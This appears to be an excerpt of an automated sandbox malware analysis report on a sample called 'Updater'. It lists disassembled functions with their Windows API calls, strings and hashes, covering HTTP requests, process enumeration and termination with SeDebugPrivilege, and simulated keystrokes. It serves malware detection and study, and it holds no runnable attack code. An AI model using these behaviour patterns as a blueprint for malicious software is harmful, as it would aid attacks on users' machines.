SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00764442
GetWindowLongW.USER32(?,000000F0), ref: 00764469
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0076448C
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00764504

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: c331f820866ac28b0579eccaab7aab71cabb14db8bde963511a3d464f3daca9b
Instruction ID: f92b26451df6bb5a6a1915225826b15dc18669824007a43413afdcb6656d4d83
Opcode Fuzzy Hash: c331f820866ac28b0579eccaab7aab71cabb14db8bde963511a3d464f3daca9b
Instruction Fuzzy Hash: 86618C75900208AFDB20DFA8CC81EEE77B8EF49700F10415AFE16A7292D778AD56DB54

Function 00702B57 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00702B6B

Part of subcall function 007027F4: RtlFreeHeap.NTDLL(00000000,00000000,?,006DFC79,?,?,006D111E), ref: 0070280A

_free.LIBCMT ref: 00702B77
_free.LIBCMT ref: 00702B82
_free.LIBCMT ref: 00702B8D
_free.LIBCMT ref: 00702B98
_free.LIBCMT ref: 00702BA3
_free.LIBCMT ref: 00702BAE
_free.LIBCMT ref: 00702BB9
_free.LIBCMT ref: 00702BC4
_free.LIBCMT ref: 00702BD2

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _free$FreeHeap
String ID:
API String ID: 2929853658-0
Opcode ID: ff8d30e4587c752288035708c26004be4add4462dafa16c5691882b3f2fc5874
Instruction ID: 146d133e7c996b4aae9c079ad470be9a3696ed666148bcb8c938e91fe472d2a8
Opcode Fuzzy Hash: ff8d30e4587c752288035708c26004be4add4462dafa16c5691882b3f2fc5874
Instruction Fuzzy Hash: 1D11777A504188FFCF45EF58C85ACDA3BA5EF04350B5192A5BB084B2A3DA35DA51EB40

Function 006D94B8 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 333comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006D9501
OleUninitialize.OLE32(?,00000000), ref: 006D95A0
UnregisterHotKey.USER32(?), ref: 006D9787
DestroyWindow.USER32(?), ref: 00718D83
FreeLibrary.KERNEL32(?), ref: 00718DE8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00718E15

Strings

close all, xrefs: 006D94FC

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 575eaa9deed59933214deabfc691af5e8400f2c6bbfeea01678daf4d18479f94
Instruction ID: 664c6e25c9a359f0a077cda422d3db6c1a4fc6afb785156a414a77c3e921d773
Opcode Fuzzy Hash: 575eaa9deed59933214deabfc691af5e8400f2c6bbfeea01678daf4d18479f94
Instruction Fuzzy Hash: 71D18F31B01212CFCB65EF14D495B69F7A2BF04710F1042AEE90A6B3A2DB34AC62CF55

Function 0073C563 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,REMOVE), ref: 0073C5C8

Strings

APPEND, xrefs: 0073C76A
KEYS, xrefs: 0073C637
EXISTS, xrefs: 0073C6CB
REMOVE, xrefs: 0073C5A9

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CompareString_wcslen
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1025422365-769500911
Opcode ID: b0e1ece2793b2e0c250c82ccce568fc2f114032d9503f725bb57161eaf8f4755
Instruction ID: 9eafdd1e172bddca2f9c235ca228e0ca5cc133e48893f533ebae1cf432d9a4a7
Opcode Fuzzy Hash: b0e1ece2793b2e0c250c82ccce568fc2f114032d9503f725bb57161eaf8f4755
Instruction Fuzzy Hash: 96917B71A08301DFDB52DF14C885AAAB7E5FF88714F04492DF896AB2A2D778DD04CB52

Function 00744358 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007443A0

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

LoadStringW.USER32(?,?,00000FFF,?), ref: 007443C6

Strings

"%s" (%d) : ==> %s:, xrefs: 007444FE
"%s" (%d) : ==> %s:%s%s, xrefs: 007444E0
Error: , xrefs: 007444AB
Line %d (File "%s"):, xrefs: 00744427
^ ERROR, xrefs: 00744485

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: ba2ae2c6c0c35c289e994e981119a94f4ccbd6293ba38f5b9524c2b9cdb1ca95
Instruction ID: 927fdad84479d14b5fd22b5cbec6471e4804cf0f6826e9564a664f87d030b523
Opcode Fuzzy Hash: ba2ae2c6c0c35c289e994e981119a94f4ccbd6293ba38f5b9524c2b9cdb1ca95
Instruction Fuzzy Hash: E6515171D00109FBCF15EBE0DC96EEEBB7AAF05300F04416AF506721A2DB381A95DB95

Function 0074CD34 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0074CD53
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0074CD7B
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0074CDAB
GetLastError.KERNEL32 ref: 0074CE03
SetEvent.KERNEL32(?), ref: 0074CE17
InternetCloseHandle.WININET(00000000), ref: 0074CE22

Strings

, xrefs: 0074CD9C

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 9ac8dc9bad36e49b0f99a95dedd4477267c66dcf5a539aa59ff3ecc00c7fd814
Instruction ID: 6c4b55dea57e54628bb2ab0c22293f01ec6a16ada765b927bfe6195627582784
Opcode Fuzzy Hash: 9ac8dc9bad36e49b0f99a95dedd4477267c66dcf5a539aa59ff3ecc00c7fd814
Instruction Fuzzy Hash: 8C314BB1A01704AFD7729F65DC88AAB7BFCEB49740B10452EF446D7200DB78DD049BA1

Function 0073A66B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0072690F,?,?,Bad directive syntax error,0076D938,00000000,00000010,?,?), ref: 0073A68C
LoadStringW.USER32(00000000,?,0072690F,?), ref: 0073A693

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0073A757

Strings

Line %d:, xrefs: 0073A6E2
., xrefs: 0073A73D
Line %d (File "%s"):, xrefs: 0073A6FD
Error: , xrefs: 0073A725
%s (%d) : ==> %s.: %s %s, xrefs: 0073A6C1

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 519374de3ea2652a56457fb0260e3fb0989cf9d0e86d1e4f6fd5f0fbb4a91c81
Instruction ID: 09352b13fed02ebc2811c9c6d0fe2ea01a3d2e76cdcbc2c2c1c1d1166cd762a4
Opcode Fuzzy Hash: 519374de3ea2652a56457fb0260e3fb0989cf9d0e86d1e4f6fd5f0fbb4a91c81
Instruction Fuzzy Hash: 6621CE72C1020EFBCF15EF90CC5AEEE773ABF18300F04446AF50A661A2DA749A58DB51

Function 00733154 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00733160
GetClassNameW.USER32(00000000,?,00000100), ref: 00733175
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00733202

Strings

list, xrefs: 007331E4
details, xrefs: 007331B0
smallicons, xrefs: 007331CA
largeicons, xrefs: 00733196
SHELLDLL_DefView, xrefs: 00733181

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: d7d0487fe2732e0e23f9636e470e65b1ce6064190fbf155315e1d27c2bd897cf
Instruction ID: 75ab997d00cc90a2860a92369466e63cff009ad831e437c892969504b97f8b63
Opcode Fuzzy Hash: d7d0487fe2732e0e23f9636e470e65b1ce6064190fbf155315e1d27c2bd897cf
Instruction Fuzzy Hash: 16110A7634870BBAFA302624EC07DB77B9C9B11734F20421AFA15A50D3FEAA7A005598

Function 0070CCC0 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0070CCE7
_free.LIBCMT ref: 0070CD52
_free.LIBCMT ref: 0070CD78
_free.LIBCMT ref: 0070CDA1
_free.LIBCMT ref: 0070CDD9
_free.LIBCMT ref: 0070CE0A
_free.LIBCMT ref: 0070CE4B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0070CECC
_free.LIBCMT ref: 0070CEE5

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 5da3ef9ae5f67b56a7710e22789cd7053e9ba856d1ca430e7a9b316fb84fe4c4
Instruction ID: 6effd0be89348f5f5a067e7e5248b8a7a7277f6d052ace1d7da5fc9451729db4
Opcode Fuzzy Hash: 5da3ef9ae5f67b56a7710e22789cd7053e9ba856d1ca430e7a9b316fb84fe4c4
Instruction Fuzzy Hash: 29610872B04301EFDB26AF78D88966E7FE4AF05350F1443BDEA459B2D2D63D89418790

Function 006E555B Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00728FD7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00728FF9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00729011
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0072902F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00729050
DestroyIcon.USER32(00000000,?,?,?,?,?,006DC4A3,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0072905F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0072907C
DestroyIcon.USER32(00000000,?,?,?,?,?,006DC4A3,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0072908B

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 5734b2d417606804516c6e4e6db0f251b0a15f01ac734edd97d3b7e2c288de60
Instruction ID: f072c310324024ba6d86f5b4b15296610d78646efcec0c7ad1e390e717b5a8ca
Opcode Fuzzy Hash: 5734b2d417606804516c6e4e6db0f251b0a15f01ac734edd97d3b7e2c288de60
Instruction Fuzzy Hash: E0518970A0170AEFDB20DF25DC45BAA3BB6EB48314F104218F90697290DBB9ED81DB64

Function 0074CC24 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0074CC63
GetLastError.KERNEL32 ref: 0074CC76
SetEvent.KERNEL32(?), ref: 0074CC8A

Part of subcall function 0074CD34: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0074CD53
Part of subcall function 0074CD34: GetLastError.KERNEL32 ref: 0074CE03
Part of subcall function 0074CD34: SetEvent.KERNEL32(?), ref: 0074CE17
Part of subcall function 0074CD34: InternetCloseHandle.WININET(00000000), ref: 0074CE22

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 70769bb9f9ef77e93e06c5e220a433f712043bbb7f8edf29decca5127095604e
Instruction ID: 8ab8c7328d4aa4c56b3c3660eec09af90128d81e91308b65d6d440ead0dd52c8
Opcode Fuzzy Hash: 70769bb9f9ef77e93e06c5e220a433f712043bbb7f8edf29decca5127095604e
Instruction Fuzzy Hash: 79315C71B02705EFDB629F65DC48A6ABBF8FF48300B14842DF85A86610D779E814EF60

Function 0073367A Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00733E94: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00733EB2
Part of subcall function 00733E94: GetWindowThreadProcessId.USER32(?,00000000), ref: 00733EC3
Part of subcall function 00733E94: GetCurrentThreadId.KERNEL32 ref: 00733ECA
Part of subcall function 00733E94: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,?,?,?,0073368B), ref: 00733ED1

MapVirtualKeyW.USER32(00000025,00000000), ref: 00733695
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007336B3
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007336B7
MapVirtualKeyW.USER32(00000025,00000000), ref: 007336C1
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007336D9
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 007336DD
MapVirtualKeyW.USER32(00000025,00000000), ref: 007336E7
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007336FB
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 007336FF

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Message$PostSleepThreadVirtual$AttachCurrentInputProcessSendTimeoutWindow
String ID:
API String ID: 2686503918-0
Opcode ID: dfaccfc5429b1746d210d0fc2517930e8e9e2f4186bae307fc4cf9da274bbfde
Instruction ID: 43cdc2596643499dc1016fb8df8f9160cf4439690b1c51deec31db8f295f3b3f
Opcode Fuzzy Hash: dfaccfc5429b1746d210d0fc2517930e8e9e2f4186bae307fc4cf9da274bbfde
Instruction Fuzzy Hash: 4D01F131790314BBFB306B688C8EF597B5ADB4AB51F100001F319AE1E0C9EA2C40CA6D

Function 014A8155 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,014A8420,?,?,00000000,00000000), ref: 014A818B

Part of subcall function 014A6959: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 014A6977

Strings

m/d/yy, xrefs: 014A825A
AMPM, xrefs: 014A839F
AMPM , xrefs: 014A83AE
:mm, xrefs: 014A83BE
:mm:ss, xrefs: 014A83DB
mmmm d, yyyy, xrefs: 014A8287

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 700eef214a6553c66d6bf0714acbb9bc5c50e5ed2689770aabfd777d1eb1407b
Instruction ID: 80b7abf81e8902434a6f34d4c27112248d3f3e62d2f410d637477184b0e49e39
Opcode Fuzzy Hash: 700eef214a6553c66d6bf0714acbb9bc5c50e5ed2689770aabfd777d1eb1407b
Instruction Fuzzy Hash: 6D614470B0414A9BDB10EFA6D890ADE77BAEBB8200FD7943FE141AB775DA34D9054710

Function 0073D36C Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006E2306: _wcslen.LIBCMT ref: 006E230B

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0073D48A
_wcslen.LIBCMT ref: 0073D4D1
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0073D538
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0073D566

Strings

)z, xrefs: 0073D3E7
0, xrefs: 0073D44B
p)z, xrefs: 0073D3B8

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0$p)z$)z
API String ID: 1227352736-291590143
Opcode ID: 00f86f300a4eddb65b4bab5f7bc0ac305f77bb2ffe8e6d36ee6d4b569618f970
Instruction ID: 105e0d3d6d2cf923f02396c3dcea5aba3c44b373b455cb0c29ae13b9dd1ef0a1
Opcode Fuzzy Hash: 00f86f300a4eddb65b4bab5f7bc0ac305f77bb2ffe8e6d36ee6d4b569618f970
Instruction Fuzzy Hash: F551F3B16043009BE7359F28E845B7B77E8AF86318F040A2DF995D3193EB78DD148B56

Function 0075AAD8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0073E2AB: CreateToolhelp32Snapshot.KERNEL32 ref: 0073E2D0
Part of subcall function 0073E2AB: Process32FirstW.KERNEL32(00000000,?), ref: 0073E2DE
Part of subcall function 0073E2AB: CloseHandle.KERNEL32(00000000), ref: 0073E3BC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0075AB63
GetLastError.KERNEL32 ref: 0075AB76
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0075ABA9
TerminateProcess.KERNEL32(00000000,00000000), ref: 0075AC5E
GetLastError.KERNEL32(00000000), ref: 0075AC69
CloseHandle.KERNEL32(00000000), ref: 0075ACBA

Strings

SeDebugPrivilege, xrefs: 0075AB85

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 7427a23d5780f812dacb3361a4a86be4f67352252cf93e71ce095a1b650a14f4
Instruction ID: 7638d3f2537e935bfc9af58801ffe8f4fc3b2a005c8cd6efecacd885b106e296
Opcode Fuzzy Hash: 7427a23d5780f812dacb3361a4a86be4f67352252cf93e71ce095a1b650a14f4
Instruction Fuzzy Hash: D461BE70204242AFD720DF15C494F65BBE1AF44318F1585ACE8664BBA3C7B9ED49CB92

Function 0076421E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007642BD
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 007642D2
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007642EC
_wcslen.LIBCMT ref: 00764331
SendMessageW.USER32(?,00001057,00000000,?), ref: 0076435E
SendMessageW.USER32(?,00001061,?,0000000F), ref: 0076438C

Strings

SysListView32, xrefs: 0076428F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

